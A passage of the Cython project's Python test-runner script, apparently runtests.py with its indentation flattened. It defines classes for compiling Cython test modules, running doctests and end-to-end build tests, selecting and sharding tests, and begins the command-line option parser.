shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter()
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter()
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Main import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Main import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def shortDescription(self):
if self.cython_only:
return CythonCompileTestCase.shortDescription(self)
else:
return "compiling (%s%s) and running %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
# Py2.6 lacks "_TextTestResult.skipped"
failures, errors, skipped = len(result.failures), len(result.errors), len(getattr(result, 'skipped', []))
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
output = None
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
output = open(result_file, 'wb')
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
try:
if output is not None:
output.close()
except:
pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception("Tests in module '%s' were unexpectedly killed by signal %d"%
(module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
input = open(result_file, 'rb')
try:
PartialTestResult.join_results(result, pickle.load(input))
finally:
input.close()
if result_code:
raise Exception("Tests in module '%s' exited with status %d" %
(module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run((
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
))
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
try:
self.skipped
except AttributeError:
self.skipped = [] # Py2.6
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
try:
result.skipped.extend(skipped)
except AttributeError:
pass # Py2.6
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.name)
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "tox.ini")
paths = glob.glob(os.path.join(self.cython_dir, "**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
commands = (self.commands
.replace("CYTHON", "PYTHON %s" % os.path.join(self.cython_root, 'cython.py'))
.replace("PYTHON", sys.executable))
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
env['PYTHONPATH'] = self.cython_syspath + os.pathsep + (old_path or '')
cmd = []
out = []
err = []
for command_no, command in enumerate(filter(None, commands.splitlines()), 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if ' setup.py ' in command else 'etoe-run'):
p = subprocess.Popen(command,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True,
env=env)
_out, _err = p.communicate()
cmd.append(command)
out.append(_out)
err.append(_err)
res = p.returncode
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
self.assertEqual(0, os.system(
"make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
try:
os.remove('make.output')
except OSError:
pass
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = (testname in self.excludes
or testname.split('.')[-1] in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=sys.version_info[0] < 3):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(testname) & 0x7fffffff if _is_py2 else _hash(testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.currentThread()
blocking_threads = []
for t in threading.enumerate():
if not t.isAlive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.isAlive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
